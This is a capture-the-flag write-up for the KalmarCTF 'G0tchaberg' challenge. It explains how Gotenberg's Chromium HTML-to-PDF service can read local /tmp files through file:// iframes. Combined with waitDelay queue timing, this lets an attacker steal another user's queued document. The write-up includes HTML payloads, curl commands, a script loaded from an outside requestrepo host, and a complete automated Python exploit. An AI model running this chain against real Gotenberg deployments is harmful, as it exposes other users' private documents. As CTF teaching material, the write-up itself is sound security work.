Post

G0tchaberg

G0tchaberg

Description

Can you steal the flag, even though I’m using the latest version of https://github.com/gotenberg/gotenberg?

Individual instances can be started at the link below:

https://lab1.kalmarc.tf/

Solution

Initial Look

We are given the source code of the application. There are 4 files, Dockerfile, compose.yml, entrypoint.sh, and index.html.

Dockerfile

We can see that the application is based on alpine:latest and installs curl as a dependency. The entrypoint.sh script is copied to the /app directory and is set as the entrypoint.

1
2
3
4
5
6
7
8
9
10
FROM alpine:latest

RUN apk add --no-cache curl

WORKDIR /app

COPY entrypoint.sh index.html ./
RUN chmod +x entrypoint.sh

CMD ["./entrypoint.sh"]

entrypoint.sh

We can see that the script sends a POST request to http://gotenberg:3000/forms/chromium/convert/html with the index.html file as a form data, every 5 seconds. The output is saved as output.pdf.

1
2
3
4
5
6
#!/bin/sh

while true; do
    curl -s 'http://gotenberg:3000/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf
    sleep 5
done

index.html

This is the file that contains the flag.

1
2
3
4
5
6
7
8
9
10
11
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Flag</title>
</head>
<body>
	<h1>Very private information!</h1>
    <h2>kalmar{test_flag}</h2>
</body>
</html>

compose.yml

This file is used to start the application. It starts the gotenberg service and the flagbot service. The flagbot service depends on the gotenberg service.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
services:
  gotenberg:
    restart: unless-stopped
    image: gotenberg/gotenberg:latest # https://gotenberg.dev/
    ports:
      - "8642:3000"
    networks:
      - local

  flagbot:
    restart: unless-stopped
    build: ./flagbot
    depends_on:
      - gotenberg
    networks:
      - local

networks:
  local:

Gotenberg

Gotenberg provides a developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more! Thanks to Docker, you don’t have to install each tool in your environments; drop the Docker image in your stack, and you’re good to go!

By reading the documentation of Gotenberg, we find all the available routes.

Let’s try to convert an HTML file to a PDF file using the /forms/chromium/convert/html route.

1
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf
1
2
3
4
5
<html>
<body>
    <h1>MariosK1574</h1>    
</body>
</html>

alt text

It works!

Digging Deeper

So far we have no idea how to get the flag. Let’s see if there are any known vulnerabilities or open issues with Gotenberg.

We came across this issue

alt text

So we have local file read under the /tmp directory. Still don’t know how this can help us. What is stored in the /tmp directory?

Let’s hop into the container and find out more.

alt text

We can see there are 2 directories, with random UUIDs as names. One has information about the browser and the other is empty. One thing we notice is that in the empty directory, we see another directory being created for an instant and then being deleted. This is happening every 5 seconds. This is the same time interval as the entrypoint.sh script.

Let’s read the documentation again and try to find an option that would allow us to delay the deletion of the temporary files.

Wait Before Rendering

We notice that there is an option called waitDelay that can be used to wait when loading an HTML document before converting it to a PDF(View Link).

alt text

Let’s send a request with the waitDelay option and take a look at the /tmp again

1
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' --form 'waitDelay=15s' -o ./output.pdf

alt text

Hmmm, this is very interesting. We list the files in the directory and we just see 1 directory, and then we list it once again a few seconds later and we see 2 directories. Let’s send another request and check the contents of the directories.

alt text

We can see that in the first directory, there is the original index.html we sent, and in the second directory, there is the index.html containing the flag.

Now we start to understand how gotenberg works.

Exploitation

Chromium Queue

From the experimentations we did, we got a grasp of how the Chromium queue works in Gotenberg. Every request that is sent to the chromium service is added to a queue. For each request in the queue, a new directory is created with a random UUID as the name, and in that directory, the original documents that are to be converted are stored. One request is processed at a time. After the request is processed, and the document is converted to pdf, the directory is deleted and the pdf is sent back to the user. Finally, the request is removed from the queue and the next request is processed.

File Read

Let’s create a temporary file (“Hello World!”) in the /tmp directory and try to read it.

1
<iframe src="file:///tmp/test.txt"></iframe>
1
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

alt text

We can see that the file is read successfully. Let’s also try to list the contents of the /tmp directory.

1
<iframe src="file:///tmp/" width="100%" height="100%"></iframe>
1
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

alt text

We can see that the contents of the /tmp directory are listed successfully.

So far we know the following:

  • We can list the contents of the /tmp directory
  • We can read files in the /tmp directory
  • We know the flag is stored in the /tmp directory
  • We can delay the deletion of the temporary files, allowing us to read the flag

Let the Magic Begin

When we start thinking about the attack chain, we immediately come across a problem. We can try to send a request to list the directories with a delay, to get the UUID of the directory that contains the flag but as soon as the request is done, the flag will be deleted. So we will have the correct UUID but we won’t be able to send a follow-up request to read the flag, because it will not be there anymore.

After some brainstorming, we come up with the following attack chain:

  • Send a request to list the contents of the /tmp directory to get the UUID of the empty directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>
  • Send a request to list the contents of the empty directory to get the UUID of the directory that contains the flag. This request will contain an iframe that loads the empty directory. We add a delay to the request to give us enough time for the other requests to enter the queue. 1st request on the queue
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var uuid = '';
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>
  • Immediately send a request to read the flag. This request will contain a script tag that loads a script that we host on our server. This script will dynamically create an iframe that loads the flag. We add a delay to the request to give us enough time to process the previous requests, extract the UUIDs from the pdf and update the script. 2nd request on the queue
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = 'https://t9gk8ph0.requestrepo.com/main.js';
            document.head.appendChild(script);

        }, 15000);
    </script>
  </body>
</html>
1
2
3
4
5
6
7
var uuid1 = '';
var uuid2 = '';
var iframe = document.createElement('iframe');
iframe.src = `file:///tmp/${uuid1}/${uuid2}/index.html`;
iframe.height = 1000;
iframe.width = 1000;
document.body.appendChild(iframe);
  • The flagbot service will send a request to convert the index.html file to a pdf. 3rd request on the queue

Automated Python Script

We implemented the attack chain in a python script. It uses requestrepo to host the script.

Note: You may have to run the script 3-4 times, since we haven’t found a way to identify with certainty which UUID from the 3 we get is the correct one.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
import requests
import fitz
import re
from io import BytesIO
from requestrepo import Requestrepo
import concurrent.futures
import time

base_url = "https://9848daeb59d6995c04676fa4311bc27f-51763.inst1.chal-kalmarc.tf"
url = f"{base_url}/forms/chromium/convert/html"
requestrepo_url = "" # Your requestrepo url
token = "" # Your requestrepo token

uuid_pattern = r"\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\b"

stages = [
    {
        "name": "Stage-1",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>""",
        "waitDelay": "1s"
    },
    {
        "name": "Stage-2",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var uuid = '{uuid1}';  // Insert uuid1 here
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    },
    {
        "name": "Stage-3",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = '"""+requestrepo_url+"""main.js';
            document.head.appendChild(script);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    }
]

def extract_uuids_from_pdf(pdf_data):
    pdf_stream = BytesIO(pdf_data)
    doc = fitz.open(stream=pdf_stream, filetype="pdf")

    extracted_text = "\n".join([page.get_text("text") for page in doc])

    uuids = re.findall(uuid_pattern, extracted_text)
    
    return uuids, extracted_text

def process_stage(stage, uuid1=None, uuid2=None, uuid3=None, uuid4=None):
    print(f"\n🚀 Sending {stage['name']} request...")

    if(stage["name"] == "Stage-3"):
        time.sleep(1)

    html_content = stage["html"]
    if uuid1:
        html_content = html_content.replace("{uuid1}", uuid1)
    if uuid2:
        html_content = html_content.replace("{uuid2}", uuid2)
    if uuid3:
        html_content = html_content.replace("{uuid3}", uuid3)
    if uuid4:
        html_content = html_content.replace("{uuid4}", uuid4)

    files = {"files": ("index.html", html_content, "text/html")}
    data = {"waitDelay": stage["waitDelay"]}

    response = requests.post(url, files=files, data=data)

    if response.status_code == 200:
        pdf_data = response.content

        uuids, extracted_text = extract_uuids_from_pdf(pdf_data)

        print(f"\n📝 Extracted Text from {stage['name']} PDF:\n")
        print(extracted_text)

        if uuids:
            print("\n🔍 Extracted UUIDs:")
            for uuid in uuids:
                print(uuid)
            return uuids
        else:
            print("\n❌ No UUIDs found in the extracted text.")
            return None
    else:
        print(f"⚠️ Error: Received status code {response.status_code}")
        print(f"⚠️ Error: Received response content {response.content}")
        return None

def update_requestrepo(uuids):
    client = Requestrepo(token=token, host="requestrepo.com", port=443, protocol="https")

    if len(uuids) >= 3:
        script_content = f"""
        var uuid1 = '{uuids[0]}';
        var uuid2 = '{uuids[2]}';
        var iframe = document.createElement('iframe');
        iframe.src = `file:///tmp/$/$/index.html`;
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
        """
        
        client.update_http(raw=script_content.encode())
        client.update_http(headers={"Content-Type": "application/javascript"})
        print("\n✅ main-remote.js updated with the UUIDs.")
    else:
        print("❌ Not enough UUIDs to update main-remote.js.")

def test_stages_concurrently():
    print("🚀 Starting Stage-1...")
    uuids_stage_1 = process_stage(stages[0])

    if uuids_stage_1:
        uuid1 = uuids_stage_1[1]
        print(f"🔑 Extracted UUID from Stage-1: {uuid1}")

        with concurrent.futures.ThreadPoolExecutor() as executor:
            future_stage_2 = executor.submit(process_stage, stages[1], uuid1)
            future_stage_3 = executor.submit(process_stage, stages[2], uuid1)

            uuids_stage_2 = future_stage_2.result()
            if uuids_stage_2:
                print("\n🔑 Extracted UUIDs from Stage-2:")
                for uuid in uuids_stage_2:
                    print(uuid)
                update_requestrepo(uuids_stage_2)

            uuids_stage_3 = future_stage_3.result()
            if uuids_stage_3:
                print("\n🔑 Extracted UUIDs from Stage-3:")
                for uuid in uuids_stage_3:
                    print(uuid)

                uuids = uuids_stage_2 + uuids_stage_3
                print("\n🔑 Combined UUIDs extracted from Stage-2 and Stage-3:")
                for uuid in uuids:
                    print(uuid)

if __name__ == "__main__":
    test_stages_concurrently()

Dependencies:

1
pip install PyMuPDF requestrepo fitz requests

alt text

Flag

The flag is kalmar{g0tcha!_well_done_that_was_fun_wasn't_it?_we_would_appreciate_if_you_create_a_ticket_with_your_solution}.

This post is licensed under CC BY 4.0 by the author.